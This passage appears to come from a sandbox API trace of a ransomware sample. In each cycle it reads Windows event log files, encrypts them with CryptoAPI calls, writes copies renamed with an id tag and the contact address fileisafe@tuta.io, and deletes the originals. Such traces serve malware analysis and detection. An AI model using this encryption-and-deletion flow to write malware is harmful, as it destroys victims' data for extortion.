(lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 1 [0065.617] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.617] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.617] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.617] CloseHandle (hObject=0x30c) returned 1 [0065.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 0x20 [0065.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.617] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.617] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.617] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.617] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.618] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72140) returned 1 [0065.618] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.618] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.620] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.620] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.621] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0065.622] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.622] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.622] CryptDestroyKey (hKey=0xf71b80) returned 1 [0065.622] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.622] CryptDestroyKey (hKey=0xf72140) returned 1 [0065.622] CloseHandle (hObject=0x30c) returned 1 [0065.622] CloseHandle (hObject=0x2e4) returned 1 [0065.624] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 1 [0065.625] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.625] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.625] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.626] CloseHandle (hObject=0x2e4) returned 1 [0065.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 0x20 [0065.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.626] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.626] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.626] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.626] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.626] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e80) returned 1 [0065.626] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.626] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.628] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.628] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.630] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0065.630] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.630] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.630] CryptDestroyKey (hKey=0xf71b80) returned 1 [0065.630] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.630] CryptDestroyKey (hKey=0xf71e80) returned 1 [0065.630] CloseHandle (hObject=0x2e4) returned 1 [0065.630] CloseHandle (hObject=0x30c) returned 1 [0065.632] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 1 [0065.635] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.636] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.636] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.636] CloseHandle (hObject=0x30c) returned 1 [0065.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 0x20 [0065.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.636] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.637] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.637] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.637] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.637] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0065.637] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.637] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.639] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.640] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.641] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f40) returned 1 [0065.641] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.641] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.641] CryptDestroyKey (hKey=0xf71f40) returned 1 [0065.641] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.642] CryptDestroyKey (hKey=0xf71b80) returned 1 [0065.642] CloseHandle (hObject=0x30c) returned 1 [0065.642] CloseHandle (hObject=0x2e4) returned 1 [0065.644] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 1 [0065.645] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.645] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.645] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.645] CloseHandle (hObject=0x2e4) returned 1 [0065.645] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 0x20 [0065.645] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.646] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.646] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.646] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.646] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.646] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72140) returned 1 [0065.646] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.646] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.709] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.711] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.882] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c40) returned 1 [0065.882] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.883] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0065.883] CryptDestroyKey (hKey=0xf71c40) returned 1 [0065.883] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0065.883] CryptDestroyKey (hKey=0xf72140) returned 1 [0065.883] CloseHandle (hObject=0x2e4) returned 1 [0065.883] CloseHandle (hObject=0x30c) returned 1 [0065.885] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 1 [0065.887] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.887] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.887] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.887] CloseHandle (hObject=0x30c) returned 1 [0065.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 0x20 [0065.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.887] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.887] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.887] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.887] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.893] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71fc0) returned 1 [0065.893] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.893] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.894] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.895] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.896] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d40) returned 1 [0065.896] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.896] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.896] CryptDestroyKey (hKey=0xf71d40) returned 1 [0065.896] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.896] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0065.897] CloseHandle (hObject=0x30c) returned 1 [0065.897] CloseHandle (hObject=0x2e4) returned 1 [0065.898] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 1 [0065.900] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.900] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.900] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.900] CloseHandle (hObject=0x2e4) returned 1 [0065.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 0x20 [0065.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.900] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.900] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.901] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.901] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.905] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0065.905] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.905] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.911] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.911] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.913] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e40) returned 1 [0065.913] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.913] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.913] CryptDestroyKey 